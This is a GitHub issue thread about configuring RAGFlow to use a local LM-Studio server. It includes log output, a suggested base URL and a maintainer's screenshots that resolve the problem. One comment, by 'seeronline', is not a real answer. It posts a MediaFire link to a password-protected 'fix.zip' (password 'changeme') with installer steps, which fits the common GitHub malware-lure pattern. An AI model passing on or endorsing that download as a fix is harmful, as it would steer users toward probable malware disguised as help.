### ISSUE TITLE
[Question]: How can I attach LM-Studio?

### ISSUE THREAD

**Issue by WhaSukGO** [infiniflow/ragflow#2097]
### Describe your problem

I have my `LM-Studio` running (with port on `1234`).
The name of model is `lmstudio-community/Meta-Llama-3.1-8B-Instruct-GGUF/Meta-Llama-3.1-8B-Instruct-Q4_K_M.gguf` </br>
What should I enter for Model name and Base url?
(`http://localhost:1234/v1/` doesn't work)

## LM-Studio
![LM-Studio](https://github.com/user-attachments/assets/ed6715b4-31e0-4d84-b84c-49dfc74b5df2)
```
2024-08-26 15:19:15  [INFO] [LM STUDIO SERVER] ->	GET  http://localhost:1234/v1/models
2024-08-26 15:19:15  [INFO] [LM STUDIO SERVER] ->	POST http://localhost:1234/v1/chat/completions
2024-08-26 15:19:15  [INFO] [LM STUDIO SERVER] ->	POST http://localhost:1234/v1/completions
2024-08-26 15:19:15  [INFO] [LM STUDIO SERVER] ->	POST http://localhost:1234/v1/embeddings
```

## RAGFlow
![image](https://github.com/user-attachments/assets/5ad43058-3eff-4b26-b126-2721a7879913)

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WhaSukGO** [comment]
![image](https://github.com/user-attachments/assets/a41334fe-128d-4912-8c68-ee7bdff49166)

![image](https://github.com/user-attachments/assets/4a6db61f-afc2-4b59-a9fd-230dc2d08409)


```
Model name
lmstudio-community/Meta-Llama-3.1-8B-Instruct-GGUF/Meta-Llama-3.1-8B-Instruct-Q4_K_M.gguf

Base URL
http://127.0.0.1:1234/v1
```

I have copied from my AnythingLLM configuration:
![AnythingLLM](https://github.com/user-attachments/assets/3a95628c-8bcd-4e3f-97f5-964c8fda6afd)

**Comment by hangters** [comment]
try this 
![屏幕截图 2024-08-26 184312](https://github.com/user-attachments/assets/14adb56e-3ef9-46c7-af6d-4af0425ad68a)
then you can get this ip at server logs 
![屏幕截图 2024-08-26 184357](https://github.com/user-attachments/assets/7add2005-8837-418a-bc0b-732c77b3079e)
then 
![屏幕截图_26-8-2024_18470_localhost](https://github.com/user-attachments/assets/0a58f8ae-eca8-49f3-b5a0-96ab006eaf93)
if you cant work , just let me know

**Comment by WhaSukGO** [comment]
@hangters Really appreciate your help! Thank you so much!
